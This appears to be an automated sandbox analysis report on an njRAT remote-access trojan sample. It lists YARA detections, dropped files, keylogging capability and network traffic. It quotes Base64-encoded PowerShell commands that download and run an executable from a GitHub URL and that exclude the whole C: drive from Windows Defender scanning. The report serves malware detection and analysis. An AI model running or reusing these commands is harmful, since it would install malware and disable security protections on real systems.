Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.6:49685 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: Payload.exe.11.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 11.2.final.exe.3758448.0.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode

E-Banking Fraud

Malicious encrypted Powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=			Jump to behavior

Yara detected Njrat

Source: Yara match	File source: virus.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
